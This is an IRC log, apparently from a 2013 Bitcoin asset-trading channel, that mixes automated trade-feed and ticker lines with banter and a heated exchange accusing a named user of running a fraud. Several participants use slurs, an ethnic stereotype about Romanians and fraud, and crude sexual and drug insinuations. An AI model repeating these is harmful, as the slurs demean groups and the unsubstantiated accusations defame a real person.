much more work you will be needing later Jun 14 19:05:42 thestringpuller that's ok, so do most managers. Jun 14 19:05:44 The ones that are talented are hard to recruit, even in their infancy. Jun 14 19:05:53 peterl well it's a mmorpg, they're bottomless pits. Jun 14 19:06:01 the only thing for sure is that it'll always need more art. Jun 14 19:06:39 right, but you didn't exactly say "we have a botomless need for art", it sounds more like "we might need a picture or two drawn sometime" Jun 14 19:06:57 right. which is why i say he has a point. Jun 14 19:07:36 <[\\\]> ThickAsThieves, I know you wanna be me Jun 14 19:07:45 <[\\\]> mircea_popescu: fu2 Jun 14 19:07:48 lmao Jun 14 19:08:09 <[\\\]> art is for fags Jun 14 19:08:12 [BTCTC] [TAT.ASICMINER] 13 @ 0.0293 = 0.3809 BTC [+] Jun 14 19:08:25 i certainly didnt intend to prop myself up Jun 14 19:08:34 if i came off that way i apologize Jun 14 19:09:02 honey, you misread irc tone. you're the day's hero over here. Jun 14 19:09:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.0293 = 0.2051 BTC [+] Jun 14 19:09:21 <[\\\]> mircea_popescu: is that how you speak to PR? Jun 14 19:09:23 <[\\\]> :p Jun 14 19:09:29 [\\\] depends :D Jun 14 19:09:39 Sounded like PR was talking through mircea_popescu Jun 14 19:09:42 <[\\\]> truffles: same thing? Jun 14 19:09:42 IRC channeling Jun 14 19:09:55 anyway, imsa got mixed up into all of this because back in the ddos days he was sitting right over there and he went Jun 14 19:09:59 hey, why don't you make irc bots ? Jun 14 19:10:07 and i was like fu why didn't i think of that. Jun 14 19:10:07 <[\\\]> oh, right Jun 14 19:10:18 <[\\\]> and then I got a bunch of almost owrthless crap that pays me money Jun 14 19:10:20 <[\\\]> and I was like Jun 14 19:10:21 <[\\\]> yay Jun 14 19:10:34 <[\\\]> except the bastard wouldn't give me a real account and must use some stupid passthrough Jun 14 19:10:43 lol Jun 14 19:10:52 <[\\\]> and that about sums it up Jun 14 19:11:06 you forgot the part about your mom Jun 14 19:11:23 <[\\\]> oh right Jun 14 19:11:25 <[\\\]> my mom is dead Jun 14 19:11:29 <[\\\]> now we're all caught up Jun 14 19:11:29 cancer. Jun 14 19:12:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.0293 = 0.0586 BTC [+] Jun 14 19:13:05 <[\\\]> sorry, when she gets 'logged in', it isn't for a few minutes Jun 14 19:13:26 [BTCTC] [S.DICE-PT] 20 @ 0.0028 = 0.056 BTC [+] Jun 14 19:13:28 [BTCTC] [S.DICE-PT] 13 @ 0.00284 = 0.0369 BTC [+] Jun 14 19:13:30 [BTCTC] [S.DICE-PT] 20 @ 0.00285 = 0.057 BTC [+] Jun 14 19:14:48 [BTCTC] [DMS.PURCHASE] 38 @ 0.066231 = 2.5168 BTC [-] Jun 14 19:14:53 [HAVELOCK] [ASICM] 11 @ 0.029498 = 0.3245 BTC [+] Jun 14 19:15:00 [BTCTC] [ASICMINER-PT] 1 @ 2.8989 BTC [+] Jun 14 19:15:17 [BTCTC] [S.DICE-PT] 4 @ 0.00288 = 0.0115 BTC [+] Jun 14 19:15:58 [HAVELOCK] [ASICM] 4 @ 0.029499 = 0.118 BTC [+] Jun 14 19:16:30 prolly MLP Jun 14 19:18:11 yes Jun 14 19:18:32 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.007 = 0.077 BTC [+] Jun 14 19:18:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0293 BTC [+] Jun 14 19:19:56 [HAVELOCK] [ASICM] 1 @ 0.029499 BTC [+] Jun 14 19:20:13 maybe she used the fanbase to solve it, no? Jun 14 19:21:16 [BTCTC] [BITVPS] 10 @ 0.00068 = 0.0068 BTC [+] Jun 14 19:22:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.007 BTC [+] Jun 14 19:22:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.02929 = 0.1172 BTC [-] Jun 14 19:24:15 [MPEX] [S.MPOE] 2282 @ 0.00070138 = 1.6005 BTC [-] Jun 14 19:24:17 [MPEX] [S.MPOE] 15200 @ 0.00070137 = 10.6608 BTC [-] Jun 14 19:26:39 [HAVELOCK] [ASICM] 16 @ 0.029499 = 0.472 BTC [+] Jun 14 19:29:25 [HAVELOCK] [ASICM] 11 @ 0.029498 = 0.3245 BTC [-] Jun 14 19:29:48 [BTCTC] [TAT.ASICMINER] 8 @ 0.0293 = 0.2344 BTC [+] Jun 14 19:29:48 [BTCTC] [ASICMINER-PT] 1 @ 2.843002 BTC [-] Jun 14 19:30:12 [HAVELOCK] [ASICM] 17 @ 0.0295 = 0.5015 BTC [+] Jun 14 19:31:14 channel could use a little more trolling Jun 14 19:32:00 [BTCTC] [TAT.ASICMINER] 170 @ 0.0293 = 4.981 BTC [+] Jun 14 19:35:13 derps Jun 14 19:35:15 [HAVELOCK] [HIM] 110 @ 0.2988 = 32.868 BTC [+] Jun 14 19:35:21 [HAVELOCK] [ASICM] 70 @ 0.029498 = 2.0649 BTC [-] Jun 14 19:35:52 collusion. i like it Jun 14 19:36:30 Question: Jun 14 19:36:33 Is there any concern about mining collusion? If the top 3-4 pools teamed up, they could choose to only build on each other’s block chain and effectively ignore the rest of the network. Jun 14 19:36:47 Patrick Murck says: Jun 14 19:36:56 (PM) Many lawyers would jump on the opportunity for antitrust lawsuits if this collusion occurred. From my perspective this would clearly be an offence worth litigating. Jun 14 19:37:06 fork the blockchain, get sued. Jun 14 19:37:08 discuss Jun 14 19:37:19 patrick murck's desperate battle for relevance Jun 14 19:37:26 citation: http://www.thegenesisblock.com/town-hall-discussion-with-gavin-andresen-and-patrick-murck/ Jun 14 19:37:39 http://trilema.com/2013/the-future-of-bitcoin-regulation/ Jun 14 19:37:40 [HAVELOCK] [ASICM] 9 @ 0.029498 = 0.2655 BTC [-] Jun 14 19:37:41 [HAVELOCK] [ASICM] 5 @ 0.029 = 0.145 BTC [-] Jun 14 19:37:43 should read that and stfu. Jun 14 19:38:15 but you can and no one can do anything about it Jun 14 19:41:06 [HAVELOCK] [ASICM] 5 @ 0.0296 = 0.148 BTC [+] Jun 14 19:42:23 [HAVELOCK] [ASICM] 153 @ 0.02969988 = 4.5441 BTC [+] Jun 14 19:42:25 [HAVELOCK] [ASICM] 22 @ 0.02969989 = 0.6534 BTC [+] Jun 14 19:42:26 [HAVELOCK] [ASICM] 25 @ 0.0297 = 0.7425 BTC [+] Jun 14 19:43:15 [HAVELOCK] [ASICM] 5 @ 0.029699 = 0.1485 BTC [-] Jun 14 19:43:51 [HAVELOCK] [ASICM] 90 @ 0.0297 = 2.673 BTC [+] Jun 14 19:44:20 [HAVELOCK] [ASICM] 5 @ 0.0297 = 0.1485 BTC [+] Jun 14 19:48:28 [BTCTC] [DMS.MINING] 36 @ 0.0312 = 1.1232 BTC [-] Jun 14 19:55:20 [HAVELOCK] [VTX] 1 @ 0.48 BTC [-] Jun 14 19:56:20 [HAVELOCK] [ASICM] 7 @ 0.029699 = 0.2079 BTC [-] Jun 14 19:56:22 [HAVELOCK] [ASICM] 9 @ 0.029699 = 0.2673 BTC [-] Jun 14 19:59:16 [BTCTC] [PAJKA.BOND] 1 @ 0.0877 BTC [-] Jun 14 20:00:35 What is your opinion of libbitcoin, and are there plans to create a formal spec for Bitcoin? Jun 14 20:00:35 (Gavin Andresen) I don’t foresee us formally creating a spec within the next year … actually really at all. There are so many things to work on, I would rather spend time actually developing the code than creating a spec. Jun 14 20:00:47 ;;seen mircea_popescu Jun 14 20:00:48 mircea_popescu was last seen in #bitcoin-assets 23 minutes and 3 seconds ago: should read that and stfu. Jun 14 20:01:39 [BTCTC] [DMS.PURCHASE] 60 @ 0.066231 = 3.9739 BTC [-] Jun 14 20:04:04 almost at 3 again [G.ASICMINER-PT] 4 @ 2.99800000 = 11.99200000 Jun 14 20:04:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.02925 = 0.7313 BTC [-] Jun 14 20:07:37 [HAVELOCK] [HIM] 1 @ 0.296 BTC [-] Jun 14 20:07:45 [HAVELOCK] [HIM] 2 @ 0.294 = 0.588 BTC [-] Jun 14 20:08:06 [HAVELOCK] [HIM] 1 @ 0.29 BTC [-] Jun 14 20:08:27 [HAVELOCK] [SDICE] 4 @ 0.185 = 0.74 BTC [-] Jun 14 20:08:38 [HAVELOCK] [HIM] 4 @ 0.28888888 = 1.1556 BTC [-] Jun 14 20:09:34 [BTCTC] [ASICMINER-PT] 4 @ 2.88 = 11.52 BTC [+] Jun 14 20:09:35 [BTCTC] [ASICMINER-PT] 1 @ 2.892 BTC [+] Jun 14 20:09:36 [BTCTC] [ASICMINER-PT] 1 @ 2.892999 BTC [+] Jun 14 20:09:38 [BTCTC] [ASICMINER-PT] 1 @ 2.893 BTC [+] Jun 14 20:15:33 [BTCTC] [ASICMINER-PT] 1 @ 2.852 BTC [-] Jun 14 20:15:35 [BTCTC] [ASICMINER-PT] 1 @ 2.850002 BTC [-] Jun 14 20:15:37 [BTCTC] [ASICMINER-PT] 1 @ 2.850001 BTC [-] Jun 14 20:15:39 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 14 20:15:58 [BTCTC] [DMS.MINING] 2 @ 0.03001 = 0.06 BTC [-] Jun 14 20:17:12 [BTCTC] [DMS.PURCHASE] 18 @ 0.066231 = 1.1922 BTC [-] Jun 14 20:17:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.028306 = 0.0849 BTC [-] Jun 14 20:17:30 [BTCTC] [TAT.ASICMINER] 45 @ 0.028306 = 1.2738 BTC [-] Jun 14 20:17:41 [BTCTC] [ASICMINER-PT] 1 @ 2.8925 BTC [+] Jun 14 20:17:47 [HAVELOCK] [HIM] 1 @ 0.31 BTC [+] Jun 14 20:18:01 [BTCTC] [TAT.ASICMINER] 36 @ 0.028306 = 1.019 BTC [-] Jun 14 20:18:47 [HAVELOCK] [ASICM] 5 @ 0.029699 = 0.1485 BTC [-] Jun 14 20:19:10 [HAVELOCK] [ASICM] 2 @ 0.029699 = 0.0594 BTC [-] Jun 14 20:21:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02925 = 0.0585 BTC [+] Jun 14 20:23:37 [HAVELOCK] [ASICM] 1 @ 0.029104 BTC [-] Jun 14 20:23:39 [HAVELOCK] [ASICM] 2 @ 0.029103 = 0.0582 BTC [-] Jun 14 20:23:40 [HAVELOCK] [ASICM] 2 @ 0.029102 = 0.0582 BTC [-] Jun 14 20:23:41 [HAVELOCK] [ASICM] 2 @ 0.029101 = 0.0582 BTC [-] Jun 14 20:23:42 [HAVELOCK] [ASICM] 5 @ 0.029 = 0.145 BTC [-] Jun 14 20:25:33 [HAVELOCK] [ASICM] 107 @ 0.029 = 3.103 BTC [-] Jun 14 20:25:58 [HAVELOCK] [ASICM] 4 @ 0.029 = 0.116 BTC [-] Jun 14 20:27:07 [HAVELOCK] [ASICM] 5 @ 0.02891 = 0.1446 BTC [-] Jun 14 20:27:49 [BTCTC] [RSM] 1 @ 0.01449 BTC [+] Jun 14 20:28:40 [BTCTC] [ASICMINER-PT] 2 @ 2.893 = 5.786 BTC [+] Jun 14 20:29:56 [BTCTC] [RSM] 1 @ 0.0145 BTC [+] Jun 14 20:35:26 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00699 = 0.699 BTC [-] Jun 14 20:37:39 [BTCTC] [ASICMINER-PT] 5 @ 2.893 = 14.465 BTC [+] Jun 14 20:38:07 [BTCTC] [DMS.PURCHASE] 80 @ 0.066231 = 5.2985 BTC [-] Jun 14 20:38:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.02925 = 0.4388 BTC [+] Jun 14 20:38:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.02925 = 0.0585 BTC [+] Jun 14 20:38:39 [BTCTC] [ASICMINER-PT] 2 @ 2.86 = 5.72 BTC [-] Jun 14 20:38:42 [BTCTC] [ASICMINER-PT] 1 @ 2.850001 BTC [-] Jun 14 20:38:44 [BTCTC] [ASICMINER-PT] 2 @ 2.850001 = 5.7 BTC [-] Jun 14 20:38:45 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 14 20:38:46 [BTCTC] [ASICMINER-PT] 1 @ 2.845001 BTC [-] Jun 14 20:38:48 [BTCTC] [ASICMINER-PT] 1 @ 2.843 BTC [-] Jun 14 20:38:50 [BTCTC] [ASICMINER-PT] 1 @ 2.825 BTC [-] Jun 14 20:38:58 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [-] Jun 14 20:39:06 [BTCTC] [ASICMINER-PT] 1 @ 2.819001 BTC [-] Jun 14 20:39:12 [BTCTC] [ASICMINER-PT] 1 @ 2.815121 BTC [-] Jun 14 20:39:15 [BTCTC] [ASICMINER-PT] 1 @ 2.815102 BTC [-] Jun 14 20:39:17 [BTCTC] [BITVPS] 190 @ 0.00068 = 0.1292 BTC [+] Jun 14 20:39:18 [BTCTC] [ASICMINER-PT] 1 @ 2.815102 BTC [-] Jun 14 20:39:19 [BTCTC] [ASICMINER-PT] 1 @ 2.8151 BTC [-] Jun 14 20:39:20 [BTCTC] [ASICMINER-PT] 1 @ 2.81 BTC [-] Jun 14 20:39:22 [BTCTC] [ASICMINER-PT] 5 @ 2.81 = 14.05 BTC [-] Jun 14 20:39:25 [BTCTC] [ASICMINER-PT] 1 @ 2.802 BTC [-] Jun 14 20:39:27 [BTCTC] [ASICMINER-PT] 1 @ 2.800101 BTC [-] Jun 14 20:39:31 [BTCTC] [ASICMINER-PT] 4 @ 2.8001 = 11.2004 BTC [-] Jun 14 20:39:33 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 14 20:39:43 [BTCTC] [ASICMINER-PT] 3 @ 2.8 = 8.4 BTC [-] Jun 14 20:41:32 [HAVELOCK] [ASICM] 67 @ 0.02892 = 1.9376 BTC [+] Jun 14 20:41:48 [HAVELOCK] [ASICM] 1 @ 0.029 BTC [+] Jun 14 20:42:31 [BTCTC] [TAT.ASICMINER] 9 @ 0.0293 = 0.2637 BTC [+] Jun 14 20:43:03 [HAVELOCK] [ASICM] 1 @ 0.029 BTC [+] Jun 14 20:44:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.0293 = 0.0586 BTC [+] Jun 14 20:45:42 [HAVELOCK] [ASICM] 11 @ 0.029 = 0.319 BTC [+] Jun 14 20:48:12 [BTCTC] [TAT.ASICMINER] 45 @ 0.02925 = 1.3163 BTC [-] Jun 14 20:48:31 [BTCTC] [TAT.ASICMINER] 55 @ 0.029 = 1.595 BTC [-] Jun 14 20:48:58 [BTCTC] [ASICMINER-PT] 1 @ 2.897999 BTC [+] Jun 14 20:50:24 [BTCTC] [TAT.VIRTUALMINE] 659 @ 0.007 = 4.613 BTC [+] Jun 14 20:50:38 [BTCTC] [RSM] 1 @ 0.0145 BTC [+] Jun 14 20:51:11 ;;next Jun 14 20:51:12 expecting re-test of 88 | lower targets: 80-77, 67-72 | resistance: 102, 105-107, 110 | support: 92-94 | #bitcoin [Fri, 14 Jun 2013 04:21:56 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 13 hours, 29 minutes, and 16 seconds ago Jun 14 20:51:34 ;;bids 0 Jun 14 20:51:35 ;;ticker Jun 14 20:51:40 There are currently 23665762 bitcoins demanded at or over 0.0 USD, worth 13053769.8704 USD in total. | Data vintage: 0.0420 seconds Jun 14 20:51:41 BTCUSD ticker | Best bid: 101.00000, Best ask: 101.34999, Bid-ask spread: 0.34999, Last trade: 101.00000, 24 hour volume: 53475.71329329, 24 hour low: 97.10000, 24 hour high: 109.40000, 24 hour vwap: 102.15272 Jun 14 20:51:51 ;;asks 1111111111111111111 Jun 14 20:51:51 There are currently 130813 bitcoins offered at or under 1.11111111111e+18 USD, worth 3.20050221416e+12 USD in total. | Data vintage: 10.9226 seconds Jun 14 20:54:11 haha 130813 BTC for 3.20050221416e+12 USD. guess when bernanke achieves this :D Jun 14 20:55:00 [BTCTC] [DMS.MINING] 9 @ 0.030999 = 0.279 BTC [+] Jun 14 20:55:00 wtf is that in a real number Jun 14 20:55:04 too lazy to count Jun 14 20:55:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0293 BTC [+] Jun 14 20:55:25 imho it's 32 trillions Jun 14 20:57:13 [BTCTC] [BASIC-MINING] 1 @ 0.6999 BTC [+] Jun 14 20:57:17 [BTCTC] [BASIC-MINING] 6 @ 0.7 = 4.2 BTC [+] Jun 14 20:57:21 trillion Jun 14 20:58:12 [HAVELOCK] [ASICM] 5 @ 0.0289999 = 0.145 BTC [-] Jun 14 20:58:26 [BTCTC] [DMS.MINING] 9 @ 0.030999 = 0.279 BTC [+] Jun 14 21:01:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.02901 = 0.1741 BTC [-] Jun 14 21:01:25 [BTCTC] [TAT.ASICMINER] 22 @ 0.02901 = 0.6382 BTC [-] Jun 14 21:01:41 [BTCTC] [TAT.ASICMINER] 22 @ 0.0293 = 0.6446 BTC [+] Jun 14 21:02:04 does bitbet ever intend on delivering anything for shareholders? Jun 14 21:02:09 maybe advertising the site ? Jun 14 21:02:17 or is it just a scam. Jun 14 21:02:18 [BTCTC] [TAT.ASICMINER] 71 @ 0.029 = 2.059 BTC [-] Jun 14 21:03:59 [BTCTC] [S.BBET-PT] 9 @ 0.0021 = 0.0189 BTC [+] Jun 14 21:04:43 proximo- you get scorn for loaded questions and answers for actual questions. pick your poison. Jun 14 21:06:00 does minigame have a website? Jun 14 21:06:49 nope. you can follow http://trilema.com/category/smg/ Jun 14 21:07:18 [HAVELOCK] [ASICM] 11 @ 0.029 = 0.319 BTC [+] Jun 14 21:07:45 [BTCTC] [S.BBET-PT] 51 @ 0.00219 = 0.1117 BTC [+] Jun 14 21:08:13 [BTCTC] [RSM] 2 @ 0.0145 = 0.029 BTC [+] Jun 14 21:08:27 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [-] Jun 14 21:09:03 proximo-: use referrals to advertise yourself Jun 14 21:10:01 well its disheartening to know MP has moved on to other scams(ministry of games) :( Jun 14 21:11:00 [BTCTC] [GSDPT] 5 @ 0.002724 = 0.0136 BTC [+] Jun 14 21:11:53 which of the lolcows are you ? Jun 14 21:13:18 mircea_popescu: i dont see anywhere what MG is doing other then developing "games" Jun 14 21:14:28 well it's also building a new model caltrop but i forgot to mention. Jun 14 21:15:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.0293 = 0.586 BTC [+] Jun 14 21:16:11 sounds like another way for you to gather BTC's Jun 14 21:16:24 all of your other business's barely generate a profit. Jun 14 21:16:58 [BTCTC] [TAT.ASICMINER] 21 @ 0.0293 = 0.6153 BTC [+] Jun 14 21:17:01 proximo-: if he wanted some BTC, he could just sell more s.mpoe (which does pay nice divs, too) Jun 14 21:17:25 hed risk tanking the price Jun 14 21:17:33 and being laughed at for it Jun 14 21:18:09 getting 1000 btc out of mpoe would crash the stock Jun 14 21:18:11 [MPEX] [S.MPOE] 2618 @ 0.00070084 = 1.8348 BTC [-] Jun 14 21:18:14 lol, do google search for "trilema the jig is up" Jun 14 21:18:41 mp being laughed is surely not a factor for him Jun 14 21:18:45 at Jun 14 21:18:58 hes a con artist plain and simple. Jun 14 21:19:12 uses his exchange + social engineering skills to run a classic boiler room scam Jun 14 21:19:17 and you are the voice of truth, i see Jun 14 21:19:26 sells worthless assets at a premium Jun 14 21:19:42 even if that were true Jun 14 21:19:43 has done nothing for shareholders Jun 14 21:19:50 no one is forced to buy Jun 14 21:20:00 its still a con. Jun 14 21:20:26 i could come up with a con argument for 95% of bitcoin invetsments Jun 14 21:20:28 ill give mircea the props for being clever Jun 14 21:20:30 maybe more Jun 14 21:20:57 [HAVELOCK] [HIM] 10 @ 0.312 = 3.12 BTC [+] Jun 14 21:21:03 being able to suck thousands of bitcoins out of people for as long as he has with as clever methods Jun 14 21:21:09 is to be admired Jun 14 21:21:28 what can we admire about you? Jun 14 21:21:32 dude, i'm not fucking you. go harp somewhere else. Jun 14 21:21:47 your right its the bot. Jun 14 21:21:54 [HAVELOCK] [ASICM] 4 @ 0.029 = 0.116 BTC [+] Jun 14 21:22:05 [BTCTC] [S.MPOE-PT] 39 @ 0.000704 = 0.0275 BTC [+] Jun 14 21:22:10 proximo-: do your research or stfu. for example when MPOE lost 15k in april, there were real people who came here and claimed the profit Jun 14 21:22:14 ;;rated mircea_popescu Jun 14 21:22:14 You rated user mircea_popescu on Thu Mar 29 06:56:09 2012, giving him a rating of 1, and supplied these additional notes: His beard is sexy.. Jun 14 21:22:37 ;;rate mircea_popescu 5 Trust and stuff. Unicorns, rainbows. Jun 14 21:22:39 Rating entry successful. Your rating for user mircea_popescu has changed from 1 to 5. Jun 14 21:22:40 yea those ratings are all tiny transactions. Jun 14 21:23:02 proximo-: i'm talking to thousands of btcs Jun 14 21:23:02 please tell me about my life Jun 14 21:23:05 proximo, what is your goal and offering here? Jun 14 21:23:19 jurov: you cant name people who trade tens of thousands on mpoe. because they dont exist Jun 14 21:23:40 oh this is targeted at mpoe Jun 14 21:23:44 bah Jun 14 21:23:49 coinbr clients don't exist looool Jun 14 21:24:01 mircea_popescu is a professional fraudster Jun 14 21:24:02 none of this exists Jun 14 21:24:05 with an A game. Jun 14 21:24:16 he is good Jun 14 21:24:25 i've seen better Jun 14 21:24:27 proximo-: you are fraud with baseless accusations Jun 14 21:24:29 [BTCTC] [S.MPOE-PT] 111 @ 0.000705 = 0.0783 BTC [+] Jun 14 21:24:40 all this time hes laughing his ass off with his romanian hookers Jun 14 21:24:54 jurov: they arent baseless there is plenty of evidence. Jun 14 21:24:55 is this tiberiusv Jun 14 21:24:56 i think he prefers africans Jun 14 21:25:00 or maybe EskimoBob Jun 14 21:25:06 evidence such as? Jun 14 21:25:33 jurov: coinbr does not do tens of thousands of BTC transactions. lets not kid ourselves. Jun 14 21:25:49 classism Jun 14 21:26:01 your claims aren't evidence Jun 14 21:26:41 even on the options people have had the bot cancel out their trades when they were profitable Jun 14 21:27:02 what do you think this is, coinbase ?! Jun 14 21:27:12 [BTCTC] [ASICMINER-PT] 1 @ 2.890995 BTC [+] Jun 14 21:27:30 proximo-: that was only one case when price info wasn't reliable/available Jun 14 21:27:35 mircea_popescu: ill give you the props for running the largest fraud in bitcoin yet. Jun 14 21:27:52 knowing your ego you probably want to make sure you surpass pirate by multiples. Jun 14 21:27:53 sure doesnt sound like props Jun 14 21:28:26 sorry to burst that bubble, but pirate kinda is surpassed by many multiples. Jun 14 21:28:36 esp if you're a fan of dollar accounting. Jun 14 21:28:59 proximo-: do you have better evidence than this one case? where mpex client did not actually have anything stolen, just a trade reversed? Jun 14 21:29:02 plus we all know mp IS pirate Jun 14 21:29:04 [HAVELOCK] [ASICM] 39 @ 0.029 = 1.131 BTC [+] Jun 14 21:29:11 nothing to surpass Jun 14 21:29:13 [HAVELOCK] [ASICM] 7 @ 0.02964999 = 0.2075 BTC [+] Jun 14 21:29:26 jurov: hes not a direct thief, hes a fraudster. and a clever one. of course he doesnt directly steal. Jun 14 21:29:29 waitwut Jun 14 21:29:42 [BTCTC] [ASICMINER-PT] 1 @ 2.890996 BTC [+] Jun 14 21:29:43 [HAVELOCK] [ASICM] 50 @ 0.02965 = 1.4825 BTC [+] Jun 14 21:29:45 mircea is an expert in social engineering. Jun 14 21:29:48 proximo-: okay, so how indirectly? Jun 14 21:30:01 and mpoe-pr is social engineering nao? Jun 14 21:30:04 hahahahaha Jun 14 21:30:11 wait, she's successful ? Jun 14 21:30:15 dont know what mpoe-pr is Jun 14 21:30:17 i thought the community agreed she sucks at her job Jun 14 21:30:20 im talking about mircea. Jun 14 21:30:27 ThickAsThieves I'm 99% confident mircea_popescu is NOT pirateat40 Jun 14 21:30:27 i will give you that mp does command inertia Jun 14 21:30:41 i'm 1% sure he IS Jun 14 21:30:48 and that;s enough today, right? Jun 14 21:30:53 rock, paper, scissors? Jun 14 21:30:55 sitting around with his 50eur a night whores and snorting bolivian coke all day Jun 14 21:30:56 proximo-: you don't even know who mpoe-pr is? Jun 14 21:30:57 [BTCTC] [ASICMINER-PT] 1 @ 2.890995 BTC [-] Jun 14 21:30:58 [BTCTC] [ASICMINER-PT] 1 @ 2.890997 BTC [+] Jun 14 21:31:05 [BTCTC] [ASICMINER-PT] 1 @ 2.890998 BTC [+] Jun 14 21:31:05 laughing at you idiots Jun 14 21:31:05 [BTCTC] [ASICMINER-PT] 1 @ 2.890999 BTC [+] Jun 14 21:31:07 [BTCTC] [ASICMINER-PT] 1 @ 2.895 BTC [+] Jun 14 21:31:08 [BTCTC] [ASICMINER-PT] 1 @ 2.896 BTC [+] Jun 14 21:31:10 [BTCTC] [ASICMINER-PT] 1 @ 2.898 BTC [+] Jun 14 21:31:14 [BTCTC] [ASICMINER-PT] 7 @ 2.8989 = 20.2923 BTC [+] Jun 14 21:31:18 i don't appreciate being called an idiot Jun 14 21:31:18 jcpham omg how ? Jun 14 21:31:23 it's hurtful and unwarranted Jun 14 21:31:29 [BTCTC] [ASICMINER-PT] 5 @ 2.899 = 14.495 BTC [+] Jun 14 21:31:41 mircea is way smarter then pirate. Jun 14 21:31:58 pirate used social engineering + classic poinzi that would burst Jun 14 21:32:01 mircea can last awhile Jun 14 21:32:02 mom said there was sense in being dumb if I couldn't share it Jun 14 21:32:03 tbh it's kinda annoying. in the good old days when mpoe was the bitcoin's largest public corp, first to go over 100mn valuation etc it was one thing. but these days am is like what, > 1 mn btcs Jun 14 21:32:11 im not even a great target ;/ Jun 14 21:32:20 proximo-: are you jealous? Jun 14 21:32:24 yea especially for your ego Jun 14 21:32:34 see what happens when you complain about not enough trolling in this channel? The weeds sprout. Jun 14 21:32:42 so what's the beef, here? Jun 14 21:32:46 ;;bc,stats Jun 14 21:32:47 Current Blocks: 241532 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 387 blocks | Next Difficulty In About: 2 days, 5 hours, 41 minutes, and 16 seconds | Next Difficulty Estimate: 19269775.5014 | Estimated Percent Change: 23.47962 Jun 14 21:32:55 popescu is a con artist Jun 14 21:32:59 jcpham how the fuck are you 99% serious im not pirate is the beef. Jun 14 21:33:03 the rest is chicken. Jun 14 21:33:27 romanians are professionals when it comes to financial fraud Jun 14 21:33:27 i'm pretty sure you are not the T Jun 14 21:33:34 hes probably had great teachers Jun 14 21:33:37 you and the T didn't get along Jun 14 21:33:39 I am pirate Jun 14 21:33:47 that's why i chose this name Jun 14 21:33:48 so am I ThickAsThieves Jun 14 21:33:53 to laugh harder next time Jun 14 21:34:11 pirateat40 said a was a vluable member of his network of trust Jun 14 21:34:14 whatever that means Jun 14 21:34:20 jcpham well he had no choice lol, he knew i can see through his shit ironically enough. Jun 14 21:34:48 takes a fraudster to spot one Jun 14 21:34:54 ikr Jun 14 21:34:59 sup Jun 14 21:35:01 we kinda knew it was ponzi Jun 14 21:35:03 but that secrets Jun 14 21:35:19 proximo-: so you're spotting one. nice. Jun 14 21:35:25 lmao Jun 14 21:35:33 unintended selfcrit for 9k ? Jun 14 21:35:45 facedesk Jun 14 21:35:50 to the floor Jun 14 21:36:09 so mircea_popescu when are you going to pull the big scam Jun 14 21:36:13 i'm still planning mine Jun 14 21:37:00 let me know in advance. i want to withdraw coinbr stuff first Jun 14 21:37:07 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.007 = 0.056 BTC [+] Jun 14 21:37:12 yeah a little heads up before hand Jun 14 21:37:17 if you don't mind Jun 14 21:37:37 dudes, you gotta buy me vegas stakes Jun 14 21:37:55 and maybe if we're real close pony is friendbuttship nohomo together... Jun 14 21:37:58 maybe... Jun 14 21:38:01 eh fuck it. nm. Jun 14 21:38:34 [BTCTC] [TAT.ASICMINER] 27 @ 0.029 = 0.783 BTC [-] Jun 14 21:39:07 DRINK OVALTINE Jun 14 21:39:16 why not call it roundtine ? Jun 14 21:39:55 its branding mp, you wouldnt understand ;) Jun 14 21:40:00 dude wtf is this? I come back to tiberiusiv rantings again? Jun 14 21:40:20 middle: i take it both ways Jun 14 21:40:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [-] Jun 14 21:40:39 so he likes it in the mouth and ass? Jun 14 21:41:04 dude, thats pretty gross proximo Jun 14 21:41:08 we shouldn't deflect the conversation from romanian scammers Jun 14 21:41:14 a point was surely about to be made Jun 14 21:41:22 evidence presented, you know... Jun 14 21:41:44 i knew this romanian once and she was originally from nigeria. Jun 14 21:41:49 (true story) Jun 14 21:42:40 Count Chocula is pretty nice Jun 14 21:42:58 ahahaha Jun 14 21:43:03 :) Jun 14 21:43:18 http://i.imgur.com/wBw2DpJ.png Jun 14 21:43:20 bwahahaha Jun 14 21:43:25 [BTCTC] [ASICMINER-PT] 11 @ 2.899 = 31.889 BTC [+] Jun 14 21:43:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0293 = 0.0586 BTC [+] Jun 14 21:43:36 ok you buncha scammor wannabes. which of you is cool enough to have his own posters made ? huh ? Jun 14 21:43:43 i'm like in bruce wagner and amir taaki league here. Jun 14 21:43:53 dude just send shit to moo.com Jun 14 21:44:01 you don't need niggas to print shit Jun 14 21:44:31 lol Jun 14 21:45:00 there are like 100 websites that will print movie quality posters and ship them anywhere Jun 14 21:45:17 The Game is one of those movies where when you first watch you're like oh that was cool Jun 14 21:45:17 and then you try to show it to someone else Jun 14 21:45:25 and youre like wtf this movie is a chore Jun 14 21:45:28 [BTCTC] [ASICMINER-PT] 2 @ 2.899 = 5.798 BTC [+] Jun 14 21:47:17 yeah Jun 14 21:48:26 the game had an ever more b.s. ending Jun 14 21:49:15 jelly, tjhe lot of you Jun 14 21:50:24 [BTCTC] 